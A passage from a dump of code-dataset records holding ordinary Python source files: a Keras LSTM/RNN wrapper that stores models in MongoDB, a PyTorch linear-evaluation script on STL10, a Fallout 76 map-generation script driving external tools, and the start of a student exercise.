(v+1)\n\nprint(total)","sub_path":"euler/euler22.py","file_name":"euler22.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"454733894","text":"#!/usr/bin/env python3\n\n# @Author: George Onoufriou \n# @Date: 2018-07-02\n# @Filename: NeuralNetwork.py\n# @Last modified by: archer\n# @Last modified time: 2018-10-09\n# @License: Please see LICENSE file in project root\n\n\n\nimport pickle\nimport os, sys, pprint, copy\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom bson import objectid, Binary\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, LSTM\n\n\n\nclass NeuralNetwork():\n\n\n\n home = os.path.expanduser(\"~\")\n fileName = \"neuralNetwork\"\n prePend = \"[ \" + fileName + \" ] \"\n\n\n\n def __init__(self, db, data_pipeline, args, model_pipeline=None, logger=print):\n\n self.db = db\n self.args = args\n self.log = logger\n self.model = None\n self.cursor = None\n self.history = None\n self.sumError = None\n self.numExamples = None\n self.data_pipeline = data_pipeline\n self.model_pipeline = model_pipeline # can be None\n self.numValidExamples = None\n self.log(self.prePend + \"NN.init() success\", 3)\n self.model_dict = None\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args[\"tfLogMin\"])\n\n\n\n def getCursor(self, pipeline=None, collName=None):\n\n if(self.cursor == None) or (pipeline != None):\n pipeline = pipeline if pipeline is not None else self.data_pipeline\n collName = collName if collName is not None else self.args[\"coll\"]\n self.db.connect()\n self.cursor = self.db.getData(pipeline=pipeline, collName=collName)\n # this is to allow a higher try catch to delete it\n return self.cursor\n else:\n self.log(prePend + \"could not generate cursor as cursor already exists or no pipeline is provided\", 1)\n\n\n\n def debug(self):\n self.log(self.prePend + \"\\n\" +\n \"\\tdb obj: \" + str(self.db) + \"\\n\" +\n \"\\tdb pipeline: \" + str(self.data_pipeline) + \"\\n\" +\n \"\\tdb cursor: \" + str(self.cursor) + \"\\n\" +\n \"\\tlogger: \" + str(self.log),\n 0)\n\n\n\n # automagic model generation\n def autogen(self):\n if(self.cursor != None):\n self.generateModel()\n self.compile()\n\n\n\n #TODO: check this through yet untested\n def getModel(self):\n self.make_keras_picklable()\n\n query={}\n if(self.model_pipeline != None):\n query=self.model_pipeline\n\n self.log(self.prePend + \"query is: \" + str(query), 0)\n\n # attempt to get model using cursor\n model_cursor = self.db.getMostRecent(query=query, collName=self.args[\"modelColl\"])\n\n if(model_cursor != None):\n model_metadata = pd.DataFrame(list(model_cursor))\n self.model_dict = model_metadata.to_dict('records')\n del self.model_dict[0][\"model_bin\"] # no one wants to see the binary\n self.log(self.prePend + \"Loading model:\",0)\n pprint.pprint(self.model_dict)\n model_bin = dict(model_metadata['model_bin'])[0]\n self.model = pickle.loads(model_bin)\n self.compile()\n else:\n self.log(self.prePend + \"could not get model cursor from database: \", 2)\n\n\n\n def generateModel(self):\n if( \"lstm\" == self.args[\"type\"]):\n self.model = self.lstm()\n elif(\"rnn\" == self.args[\"type\"]):\n self.model = self.rnn()\n\n\n\n def compile(self):\n if(self.model != None):\n self.model.compile(optimizer=self.args[\"optimizer\"], loss=self.args[\"lossMetric\"])\n else:\n print(\"No model to compile, can not NN.compile()\", 1)\n\n\n\n def lstm(self):\n model = Sequential()\n #TODO: off by one error please for the love of god george\n bInShape = (1, self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n\n self.log(\n self.prePend + \"\\n\" +\n \"\\t\" + \"type:\\t\\t\" + str(self.args[\"type\"]) + \"\\n\" +\n \"\\t\" + \"layers:\\t\\t\" + str(self.args[\"layers\"]) + \"\\n\" +\n \"\\t\" + \"timesteps:\\t\" + str(self.args[\"timeSteps\"]) + \"\\n\" +\n \"\\t\" + \"dimensionality:\\t\" + str(self.args[\"dimensionality\"]) + \"\\n\" +\n \"\\t\" + \"batchSize:\\t\" + str(self.args[\"batchSize\"]) + \"\\n\" +\n \"\\t\" + \"batchInShape:\\t\" + str(bInShape) + \"\\n\" +\n \"\\t\" + \"epochs:\\t\\t\" + str(self.args[\"epochs\"]) + \"\\n\" +\n \"\\t\" + \"epochs_chunk:\\t\" + str(self.args[\"epochs_chunk\"]) + \"\\n\" +\n \"\\t\" + \"activation:\\t\" + str(self.args[\"activation\"]) + \"\\n\",\n 0\n )\n\n # gen layers\n for unused in range(self.args[\"layers\"]-1):\n model.add(LSTM(self.args[\"intLayerDim\"], activation=self.args[\"activation\"], return_sequences=True, batch_input_shape=bInShape))\n model.add(LSTM(self.args[\"intLayerDim\"], activation=self.args[\"activation\"], batch_input_shape=bInShape))\n model.add(Dense(1))\n self.log(self.prePend + \"LSTM created\", -1)\n return model\n\n\n\n def rnn(self):\n model = Sequential()\n\n self.log(\n self.prePend + \"\\n\" +\n \"\\t\" + \"type:\\t\\t\" + str(self.args[\"type\"]) + \"\\n\" +\n \"\\t\" + \"layers:\\t\\t\" + str(self.args[\"layers\"]) + \"\\n\" +\n \"\\t\" + \"timesteps:\\t\" + str(self.args[\"timeSteps\"]) + \"\\n\" +\n \"\\t\" + \"dimensionality:\\t\" + str(self.args[\"dimensionality\"]) + \"\\n\" +\n \"\\t\" + \"epochs:\\t\\t\" + str(self.args[\"epochs\"]) + \"\\n\" +\n \"\\t\" + \"activation:\\t\" + str(self.args[\"activation\"]) + \"\\n\",\n 0\n )\n\n # gen layers\n for unused in range(self.args[\"layers\"]): # don't need to use iterator just pure loop\n model.add(Dense(self.args[\"timeSteps\"],\n input_dim=self.args[\"dimensionality\"],\n activation=self.args[\"activation\"]))\n model.add(Dense(1)) # this dense 1 is the output layer since this is regression\n self.log(self.prePend + \"RNN created\", -1)\n return model # if nothing errored now we can assign model\n\n\n\n #TODO: this should be in mongodb class itself\n def nextDataset(self, batchSize=1):\n data = []\n try:\n # setting batchSize on cursor seems to do nothing\n for unused in range(batchSize):\n document = self.cursor.next()\n data.append(document)\n except StopIteration:\n self.log(\"cursor has been emptied\", -1)\n except ValueError:\n self.log(\"Value Error: please make sure that something other than \\\n plain values are returned by your pipeline e.g include an array \\\n of objects then check the following error:\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]) , 2)\n except:\n self.log(self.prePend + \"could not get next data point from mongodb:\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]) , 2)\n return data\n\n\n\n def train(self):\n self.modler(toTrain=True)\n self.saveModel()\n\n\n\n def test(self):\n if(self.model):\n self.log(self.prePend + \"model already in memory using it for testing\", 3)\n else:\n self.log(self.prePend + \"model not already in memory attempting retrieval\", 3)\n self.getModel()\n if(self.args[\"testColl\"] != \"\"):\n\n args = copy.deepcopy(self.args)\n cursor = None\n args[\"coll\"] = args[\"testColl\"]\n args[\"testColl\"] = \"\"\n try:\n nn = NeuralNetwork(db=self.db,\n logger=self.log,\n args=args,\n data_pipeline=self.data_pipeline,\n model_pipeline=self.model_pipeline,\n )\n cursor = nn.getCursor()\n nn.test()\n\n except:\n print(self.prePend + \"could not test on test dataset:\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n finally:\n if(cursor != None) and (cursor.alive):\n cursor.close()\n else:\n self.log(self.prePend + \" Recursive neural network call; coll: \" + self.args[\"coll\"] + \" testColl:\" + self.args[\"testColl\"])\n self.modler(toTest=True)\n self.saveResult()\n\n\n\n def predict(self):\n if(self.model):\n self.log(self.prePend + \"model already in memory using it for testing\", 3)\n else:\n self.log(self.prePend + \"model not already in memory attempting retrieval\", 3)\n self.getModel()\n self.modler(toPredict=True)\n\n\n\n # the universal interface that allows the code of both test and train to be\n # one single set. \"Don't repeat yourself\"\n def modler(self, toTrain=False, toTest=False, toPredict=False):\n sumError = 0\n numExamples = 0\n self.numValidExamples = 0\n\n\n # check if model exists and that cursor exists\n if(self.model) and (self.cursor):\n\n if(toTrain == True):\n self.log(\"training on \" + self.args[\"coll\"] + \" ...\" , -1)\n elif(toTest == True):\n self.log(\"testing on \" + self.args[\"coll\"] + \" ...\" , -1)\n elif(toPredict == True):\n self.log(\"predicting on \" + self.args[\"coll\"] + \" ...\" , -1)\n\n # keep looping while cursor can give more data\n while(self.cursor.alive):\n dataBatch = self.nextDataset(1)\n for mongoDoc in dataBatch:\n numExamples = numExamples + 1\n\n #TODO this is fine if both are pushed lists\n data = pd.DataFrame(list(mongoDoc[\"data\"]))\n if(self.args[\"type\"] == \"rnn\"):\n data = data.values\n else:\n data = np.expand_dims(data.values, axis=0)\n\n #TODO needs generalisation for many to many or one to many\n target = mongoDoc[\"target\"]\n target = np.full((1, 1), target)\n\n if(toTrain == True):\n self.testTrainer(data=data, target=target,\n id=mongoDoc[\"_id\"], toTrain=True)\n elif(toTest == True):\n try:\n sumError = sumError + self.testTrainer(data=data,\n target=target, id=mongoDoc[\"_id\"], toTrain=False)\n except TypeError:\n self.log(\"NN.testTrainer returned nothing\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 3)\n elif(toPredict == True):\n self.predictor(data=data, id=mongoDoc[\"_id\"], target=target if target is not None else None)\n\n if(toTrain == True):\n # cursor is now dead so make it None\n self.cursor = None\n # since this is training we need training accuracy so need to regen cursor\n self.getCursor()\n # call self again but to test now\n self.modler(toTest=True, toTrain=False)\n elif(toTest == True):\n self.sumError = sumError\n self.numExamples = numExamples\n self.modlerStatusMessage()\n\n elif(toPredict == True):\n None\n else:\n if(toTrain == True):\n self.log(self.prePend +\n \"could not train, either model not generated or cursor does not exist\"\n , 2)\n\n else:\n self.log(self.prePend +\n \"Aborting test model does not exist; unable to continue\"\n , 2)\n\n def modlerStatusMessage(self):\n self.log(self.prePend +\n \"\\n\\tsumError: \" + str(self.sumError) +\n \" \\n\\tnumExamples: \" + str(self.numExamples) +\n \" \\n\\tnumValidExamples \" + str(self.numValidExamples) +\n \" \\n\\tmeanError: \" + str(self.sumError / self.numValidExamples),\n 0)\n\n\n def testTrainer(self, data, target, id, toTrain=False):\n try:\n #TODO: off by one ... you fool george, sort this out\n if(self.args[\"type\"] == \"rnn\"):\n target = np.full((self.args[\"timeSteps\"], 1), target)\n expectShape = (self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n else:\n expectShape = (1, self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n\n # check if shape meets expectations\n if(data.shape == expectShape):\n\n if(toTrain == True):\n # self.model.summary()\n self.model.fit(x=data, y=target, batch_size=self.args[\"batchSize\"],\n epochs=self.args[\"epochs_chunk\"], verbose=self.args[\"kerLogMax\"],\n callbacks=None, validation_split=0, validation_data=None,\n shuffle=True, class_weight=None, sample_weight=None,\n initial_epoch=0, steps_per_epoch=None, validation_steps=None)\n else:\n self.numValidExamples = self.numValidExamples + 1\n return self.model.evaluate(x=data, y=target,\n batch_size=self.args[\"batchSize\"],\n verbose=self.args[\"kerLogMax\"])\n\n else:\n self.log(self.prePend + str(id) + \" \" + str(data.shape) + \" != \"\n + str(expectShape), 1)\n return 0\n\n except:\n if(self.args[\"toTrain\"]): # falling back to args directly just incase is something on the way fked up\n self.log(self.prePend + \"could not train:\\t\" + str(id) + \"\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n else:\n self.log(self.prePend + \"could not test:\\t\" + str(id) + \"\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n\n\n\n def predictor(self, data, id, target=None):\n try:\n #TODO: off by one ... you fool george, sort this out\n if(self.args[\"type\"] == \"rnn\"):\n target = np.full((self.args[\"timeSteps\"], 1), target)\n expectShape = (self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n else:\n expectShape = (1, self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n\n # check if shape meets expectations\n if(data.shape == expectShape):\n if(target != None):\n self.log(\"targ: \" + str(target) + \" \" + str(id), 3)\n\n x = self.model.predict(x=data, batch_size=self.args[\"batchSize\"],\n verbose=self.args[\"kerLogMax\"])\n self.log(\"pred: \" + str(x), 0)\n\n else:\n self.log(self.prePend + str(id) + \" \" + str(data.shape) + \" != \"\n + str(expectShape), 1)\n return -1\n\n except:\n self.log(self.prePend + \"could not predict:\\t\" + str(id) + \"\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n\n\n\n def saveModel(self):\n if(self.model != None):\n stateDict = self.args\n stateDict[\"pipe\"] = str(self.data_pipeline)\n del stateDict[\"pass\"]\n stateDict[\"utc\"] = datetime.datetime.utcnow()\n if(self.sumError):\n stateDict[\"sumError\"] = self.sumError\n if(self.numExamples):\n stateDict[\"numSamples\"] = self.numExamples\n if(self.numValidExamples):\n stateDict[\"numValidSamples\"] = self.numValidExamples\n if(self.sumError) and (self.numValidExamples):\n stateDict[\"meanError\"] = self.sumError / self.numValidExamples\n\n # save model\n self.make_keras_picklable()\n model_bytes = pickle.dumps(self.model)\n stateDict['model_bin'] = Binary(model_bytes)\n self.db.shoveJson(stateDict, collName=str(self.args[\"modelColl\"]))\n\n\n\n def saveResult(self, coll=None):\n if(self.model != None):\n stateDict = self.args\n stateDict[\"desc\"] = \"test\"\n stateDict[\"pipe\"] = str(self.data_pipeline)\n try:\n del stateDict[\"pass\"]\n except:\n pass\n stateDict[\"utc\"] = datetime.datetime.utcnow()\n if(self.sumError):\n stateDict[\"sumError\"] = self.sumError\n if(self.numExamples):\n stateDict[\"numSamples\"] = self.numExamples\n if(self.numValidExamples):\n stateDict[\"numValidSamples\"] = self.numValidExamples\n if(self.sumError) and (self.numValidExamples):\n stateDict[\"meanError\"] = self.sumError / self.numValidExamples\n if(self.model_dict != None):\n stateDict[\"utc\"] = datetime.datetime.utcnow()\n stateDict[\"modelId\"] = self.model_dict[0][\"_id\"]\n self.db.shoveJson(stateDict, collName=str(\"esperiment\"))\n\n\n\n def make_keras_picklable(self):\n import tempfile\n import keras.models\n import h5py\n\n def __getstate__(self):\n model_str = \"\"\n with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:\n keras.models.save_model(self, fd.name, overwrite=True)\n model_str = fd.read()\n d = { 'model_str': model_str }\n return d\n\n def __setstate__(self, state):\n with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:\n fd.write(state['model_str'])\n fd.flush()\n model = keras.models.load_model(fd.name)\n self.__dict__ = model.__dict__\n\n cls = keras.models.Model\n cls.__getstate__ = __getstate__\n cls.__setstate__ = __setstate__\n","sub_path":"src/neuralNetwork.py","file_name":"neuralNetwork.py","file_ext":"py","file_size_in_byte":18472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"381812389","text":"import argparse\nimport torch\nfrom torch import optim\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import STL10\nfrom tqdm import tqdm\nimport utils\nfrom network import Network\n\n\ndef train_test(net, data_loader, training_optimizer):\n is_train = training_optimizer is not None\n\n if is_train:\n net.train()\n else:\n net.eval()\n\n total_loss = 0\n total_correct_1 = 0\n total_correct_5 = 0\n total_num = 0\n data_progress = tqdm(data_loader)\n with (torch.enable_grad() if is_train else torch.no_grad()):\n for data, target in data_progress:\n data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)\n out = net(data)\n loss = loss_criterion(out, target)\n\n if is_train:\n training_optimizer.zero_grad()\n loss.backward()\n training_optimizer.step()\n\n total_num += data.size(0)\n total_loss += loss.item() * data.size(0)\n prediction = torch.argsort(out, dim=-1, descending=True)\n total_correct_1 += torch.sum((prediction[:, 0:1] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n total_correct_5 += torch.sum((prediction[:, 0:5] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n\n data_progress.set_description('{} Epoch: [{}/{}] Loss: {:.4f} ACC@1: {:.2f}% ACC@5: {:.2f}%'\n .format('Train' if is_train else 'Test', epoch, epochs, total_loss / total_num,\n total_correct_1 / total_num * 100, total_correct_5 / total_num * 100))\n\n return total_loss / total_num, total_correct_1 / total_num * 100, total_correct_5 / total_num * 100\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Linear Evaluation')\n parser.add_argument('--model_path', type=str, default='results/model_400.pth',\n help='The pretrained model path')\n parser.add_argument('--batch_size', type=int, default=512, help='Number of images in each mini-batch')\n parser.add_argument('--epochs', type=int, default=100, help='Number of sweeps over the dataset to train')\n\n args = parser.parse_args()\n model_path, batch_size, epochs = args.model_path, args.batch_size, args.epochs\n train_data = STL10(root='data', split='train', transform=utils.train_transform)\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=2, pin_memory=True)\n test_data = STL10(root='data', split='test', transform=utils.test_transform)\n test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=2, pin_memory=True)\n\n model = Network(num_class=len(train_data.classes), pretrained_path=model_path).cuda()\n for param in model.layer.parameters():\n param.requires_grad = False\n model = nn.DataParallel(model)\n\n adam = optim.Adam(model.module.fc.parameters(), lr=1e-3, weight_decay=1e-6)\n loss_criterion = nn.CrossEntropyLoss()\n results = {'train_loss': [], 'train_acc@1': [], 'train_acc@5': [],\n 'test_loss': [], 'test_acc@1': [], 'test_acc@5': []}\n\n for epoch in range(1, epochs + 1):\n train_loss, train_acc_1, train_acc_5 = train_test(model, train_loader, adam)\n test_loss, test_acc_1, test_acc_5 = train_test(model, test_loader, None)\n","sub_path":"linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"476894016","text":"#!/usr/bin/python3\n\nimport os, sys, subprocess\n\nmipLevel = 1 # resolution is 2 ^ (7 - mipLevel) per cell\nresizeOutput = \"100x100%\"\ncellRange = [-70, -70, 70, 70] # xMin, yMin, xMax, yMax\nwaterColor = 0x60002030 # A7R8G8B8\njpegQuality = 80\nenableIsometric = False\nenableMarkers = not enableIsometric and True # does not work in isometric\nmarkerAlpha = 75 # percents\nuseAdditionalMarkers = False\nenableTexture = True\ntextureMip = 4.0 # 5.0\ntextureBrightness = 1.2\nterrainBrightness = 125\nenableGCVR = False\n# enable these to save time if all the data is already extracted and up to date\nnoExtractIcons = False # do not extract map marker icons\nnoExtractTextures = False # do not extract land textures\nnoExtractTerrain = False # do not extract terrain from Appalachia.btd\nmarkerDefFileName = \"fo76icondefs.txt\"\n# SWFTools from http://www.swftools.org/download.html\nswfToolsPath = \"Program Files (x86)/SWFTools\"\n\nadditionalMarkerDefs = [[0x003BD4F4, 2, 0x3E000000, 1.0, 1]]\nadditionalMarkerDefs += [[0x003BD4F4, 2, \"interface/fo76icon_1e.dds\", 0.5, 1]]\n\nif useAdditionalMarkers:\n additionalMarkerDefs += [[0x0035D223, 2, 0x4FFF4020, 3.0, 1]]\n additionalMarkerDefs += [[0x0035D238, 2, 0x4FFF4020, 3.0, 1]]\n\nif \"win\" in sys.platform:\n imageMagickPath = \"C:/Program Files/ImageMagick-7.1.0-Q16-HDRI/magick.exe\"\n baunpackPath = \"./baunpack.exe\"\n fo76Path = \"D:/SteamLibrary/steamapps/common/Fallout76/Data\"\nelse:\n imageMagickPath = \"/usr/bin/magick\"\n baunpackPath = \"./baunpack\"\n fo76Path = \"./Fallout76/Data\"\n winePath = \"/usr/bin/wine\"\n\ndef runCmd(args):\n tmpArgs = []\n for i in args:\n tmpArgs += [str(i)]\n if not \"/\" in tmpArgs[0]:\n tmpArgs[0] = \"./\" + tmpArgs[0]\n subprocess.run(tmpArgs)\n\ndef findArchives(path, pattern = \"\"):\n fileList = []\n d = os.scandir(path)\n try:\n while True:\n fileName = d.__next__().name\n tmpName = fileName.lower()\n if pattern and not pattern in tmpName:\n continue\n if tmpName.endswith(\".bsa\") or tmpName.endswith(\".ba2\"):\n fileList += [path + \"/\" + fileName]\n except:\n pass\n return fileList\n\niconList = [ [ 0x0000, 386, \"cave\" ],\n [ 0x0001, 382, \"city\" ],\n [ 0x0002, 358, \"camp\" ],\n [ 0x0003, 301, \"factory\" ],\n [ 0x0004, 253, \"Sugarmaple\" ],\n [ 0x0006, 259, \"military\" ],\n [ 0x0007, 287, \"mountains\" ],\n [ 0x0008, 231, \"building\" ],\n [ 0x0009, 109, \"ruins\", \"200,200\" ],\n [ 0x000B, 180, \"monument\" ],\n [ 0x000C, 172, \"settlement\" ],\n [ 0x000D, 170, \"sewers\" ],\n [ 0x000E, 85, \"vault\" ],\n [ 0x000F, 414, \"airport\" ],\n [ 0x0011, 390, \"dirt track\" ],\n [ 0x0012, 384, \"church\" ],\n [ 0x0013, 378, \"golf club\" ],\n [ 0x0016, 360, \"highway\" ],\n [ 0x0017, 352, \"farm\" ],\n [ 0x0018, 348, \"Red Rocket\" ],\n [ 0x0019, 343, \"forest\" ],\n [ 0x001A, 341, \"institutional\" ],\n [ 0x001B, 339, \"cemetery\" ],\n [ 0x001C, 333, \"hospital\" ],\n [ 0x001D, 303, \"chemical\" ],\n [ 0x001E, 125, \"workshop\" ],\n [ 0x0021, 289, \"junkyard\" ],\n [ 0x0023, 223, \"pier\" ],\n [ 0x0024, 211, \"pond / lake\" ],\n [ 0x0025, 196, \"mine\" ],\n [ 0x0026, 190, \"disposal site\" ],\n [ 0x0027, 188, \"relay tower\" ],\n [ 0x002D, 111, \"town\" ],\n [ 0x002E, 404, \"Fort Atlas\", \"152,192\" ],\n [ 0x002F, 400, \"business\" ],\n [ 0x0030, 398, \"bunker\" ],\n [ 0x0031, 388, \"Prickett's Fort\" ],\n [ 0x0033, 168, \"Portside Pub\" ],\n [ 0x0034, 277, \"low rise\" ],\n [ 0x0036, 74, \"player camp\" ],\n [ 0x0038, 182, \"railroad\" ],\n [ 0x0039, 178, \"satellite array\" ],\n [ 0x003D, 186, \"raider camp\" ],\n [ 0x0040, 107, \"train station\" ],\n [ 0x0041, 362, \"power substation\" ],\n [ 0x0042, 346, \"fissure site\" ],\n [ 0x0043, 95, \"Vault 63\" ],\n [ 0x0044, 93, \"Vault 76\" ],\n [ 0x0045, 89, \"Vault 94\" ],\n [ 0x0046, 87, \"Vault 96\" ],\n [ 0x0047, 412, \"amusement park\", \"256,368\" ],\n [ 0x0048, 275, \"mansion\", \"368,280\" ],\n [ 0x0049, 408, \"Arktos Pharma\", \"256,144\", \"336,80\", \"352,48\" ],\n [ 0x004A, 209, \"power plant\", \"160,256\", \"160,320\", \"112,352\" ],\n [ 0x004B, 166, \"ski resort\", \"240,344\", \"288,344\" ],\n [ 0x004C, 410, \"App. Antiques\" ],\n [ 0x004D, 115, \"The Giant Teapot\" ],\n [ 0x004E, 416, \"agricult. center\" ],\n [ 0x004F, 77, \"shack\" ],\n [ 0x0050, 331, \"trailer\", \"224,112\", \"288,112\" ],\n [ 0x0051, 279, \"lookout\", \"192,128\" ],\n [ 0x0052, 229, \"overlook\" ],\n [ 0x0053, 198, \"Pumpkin House\" ],\n [ 0x0054, 376, \"cafe\" ],\n [ 0x0055, 396, \"cabin\" ],\n [ 0x0056, 105, \"trainyard\" ],\n [ 0x0057, 392, \"capitol\" ],\n [ 0x0058, 335, \"hi-tech building\" ],\n [ 0x0059, 281, \"lighthouse\" ],\n [ 0x005A, 356, \"Mount Blair\" ],\n [ 0x005C, 225, \"P. Winding Path\" ],\n [ 0x005D, 113, \"Top of the World\" ],\n [ 0x005E, 370, \"dam\",\n \"96,344\", \"166,388\", \"228,344\",\n \"236,344\", \"304,388\", \"372,344\" ],\n [ 0x005F, 255, \"Pylon V-13\" ],\n [ 0x0060, 79, \"The Whitespring\" ],\n [ 0x0061, 239, \"Nuka-Cola plant\" ],\n [ 0x0063, 164, \"The Crater\" ],\n [ 0x0064, 337, \"Foundation\" ],\n [ 0x0065, 374, \"Mothman Cult\", \"176,192\" ],\n [ 0x0066, 406, \"Blood Eagles\" ],\n [ 0x0067, 91, \"Vault 79\" ],\n [ 0x0069, 285, \"The Rusty Pick\", \"192,192\", \"320,192\" ],\n [ 0x006A, 97, \"Vault 51\" ] ]\n\ndef runSWFTool(args):\n if \"win\" in sys.platform:\n fullPath = \"C:/\" + swfToolsPath\n runCmd([fullPath + \"/\" + args[0]] + args[1:])\n else:\n fullPath = os.environ[\"HOME\"] + \"/.wine/drive_c/\" + swfToolsPath\n runCmd([winePath, fullPath + \"/\" + args[0]] + args[1:])\n\ndef removeFile(fileName):\n try:\n os.remove(fileName)\n except:\n pass\n\nif enableMarkers:\n if not noExtractIcons:\n runCmd([baunpackPath, fo76Path + \"/SeventySix - Interface.ba2\", \"--\",\n \"mapmarkerlibrary.swf\", \"mapmenu.swf\"])\n markerDefFile = open(markerDefFileName, \"w\")\n for i in iconList:\n iconFileName = \"interface/fo76icon_%02x.dds\" % (i[0])\n n = i[0]\n if n == 0x001E: # workshop\n swfName = \"interface/mapmarkerlibrary.swf\"\n else:\n swfName = \"interface/mapmenu.swf\"\n markerDefFile.write(\"0x%08X\\t0x%04X\\t%s\\t%g\\t7\\t// %s\\n\" % (\n 0x10, n, iconFileName, mipLevel + 0.5,\n i[2]))\n if noExtractIcons:\n continue\n runSWFTool([\"swfextract.exe\", \"-i\", i[1], swfName])\n runSWFTool([\"swfbbox.exe\", \"-e\", \"output.swf\"])\n runSWFTool([\"swfrender.exe\", \"-o\", \"output.png\", \"output.swf\"])\n removeFile(\"output.swf\")\n convertOptions = [\"-gravity\", \"center\", \"-background\", \"transparent\"]\n for j in range(3, len(i)):\n if j == 3:\n convertOptions += [\"-fill\", \"black\", \"-fuzz\", \"49%\"]\n convertOptions += [\"-draw\", \"color \" + i[j] + \" floodfill\"]\n convertOptions += [\"-filter\", \"Mitchell\"]\n if i[0] == 0x0042: # fissure site\n convertOptions += [\"-modulate\", \"100,200,3\"]\n convertOptions += [\"-resize\", \"35x35%\", \"-extent\", \"256x256\"]\n convertOptions += [\"DDS:\" + iconFileName]\n runCmd([imageMagickPath, \"convert\", \"output.png\"] + convertOptions)\n removeFile(\"output.png\")\n for i in additionalMarkerDefs:\n markerDefFile.write(\"0x%08X\\t%d\\t%s\\t%g\\t%d\\n\" % (\n (i[0], i[1], str(i[2]), mipLevel + i[3],\n i[4] + 7)))\n markerDefFile.close()\n\ndef createMap(gameName, gamePath, btdName, esmName, worldID, defTxtID):\n if not noExtractTextures:\n archiveList = findArchives(gamePath, \"textures\")\n runCmd([\"baunpack\"] + archiveList + [\"--\", \"@ltex/%s.txt\" % (gameName)])\n if not noExtractTerrain:\n args1 = [\"btddump\", gamePath + \"/Terrain/\" + btdName]\n args2 = cellRange + [mipLevel]\n runCmd(args1 + [gameName + \"hmap.dds\", \"0\"] + args2)\n runCmd(args1 + [gameName + \"ltex.dds\", \"2\"] + args2)\n if enableGCVR:\n runCmd(args1 + [gameName + \"gcvr.dds\", \"4\"] + args2)\n runCmd([\"findwater\", gamePath + \"/\" + esmName, gameName + \"wmap.dds\",\n gameName + \"hmap.dds\", worldID])\n landtxtOptions = [gameName + \"ltex.dds\", gameName + \"ltx2.dds\"]\n landtxtOptions += [\"ltex/\" + gameName + \".txt\"]\n landtxtOptions += [\"-mip\", mipLevel + textureMip]\n landtxtOptions += [\"-mult\", textureBrightness]\n if enableGCVR:\n landtxtOptions += [\"-gcvr\", gameName + \"gcvr.dds\"]\n runCmd([\"landtxt\"] + landtxtOptions)\n terrainOptions = [gameName + \"hmap.dds\", gameName + \"_map.dds\"]\n w = (cellRange[2] + 1 - cellRange[0]) << (7 - mipLevel)\n h = (cellRange[3] + 1 - cellRange[1]) << (7 - mipLevel)\n if enableIsometric:\n xyOffs = -(256 >> mipLevel)\n terrainOptions += [(w * 3) >> 1, (h * 15) >> 4, \"-iso\"]\n terrainOptions += [\"-xoffs\", xyOffs, \"-yoffs\", xyOffs]\n else:\n terrainOptions += [w, h, \"-2d\"]\n if enableTexture:\n terrainOptions += [\"-ltex\", gameName + \"ltx2.dds\"]\n terrainOptions += [\"-wmap\", gameName + \"wmap.dds\"]\n terrainOptions += [\"-lod\", \"0\", \"-watercolor\", waterColor]\n terrainOptions += [\"-light\", terrainBrightness, \"100\", \"35\"]\n runCmd([\"terrain\"] + terrainOptions)\n if enableMarkers:\n runCmd([\"markers\", gamePath + \"/\" + esmName, gameName + \"mmap.dds\",\n gameName + \"hmap.dds\", markerDefFileName])\n compositeOptions = [\"composite\", \"-dissolve\", markerAlpha]\n compositeOptions += [gameName + \"mmap.dds\", gameName + \"_map.dds\"]\n else:\n compositeOptions = [\"convert\", gameName + \"_map.dds\"]\n if resizeOutput and resizeOutput != \"100x100%\":\n compositeOptions += [\"-filter\", \"Lanczos\", \"-resize\", resizeOutput]\n compositeOptions += [\"-interlace\", \"Plane\", \"-sampling-factor\", \"1x1\"]\n compositeOptions += [\"-quality\", jpegQuality]\n compositeOptions += [\"JPEG:\" + gameName + \"_map.jpg\"]\n runCmd([imageMagickPath] + compositeOptions)\n\ncreateMap(\"fo76\", fo76Path, \"Appalachia.btd\", \"SeventySix.esm\", 0x0025DA15, 0)\n\n","sub_path":"makemap76.py","file_name":"makemap76.py","file_ext":"py","file_size_in_byte":11502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"523362509","text":"#---------------------------\n#Creator: Brittany Manuel\n#Created: September 23, 2014\n#Revisions: September 30, 2014\n#File: lightsOn_5.1.py\n#Assignment: 5.1\n#---------------------------\n\n\n\n#Import time, random, sys, set resursive stack to a larger amount.\n\n\n\nimport time \nfrom random import * \nimport sys \nsys.setrecursionlimit(100000)\n\n\n\n#---------------------------\n#Original setNewElement\n#---------------------------\n\ndef run_generations(L):\n\n\t#runGenerations keeps running evolve...\n\t#Display list, pause, evolve L into one new L, recurse\n\n\ttime.sleep(0.25)\n\tprint (L)\n\n\tif not 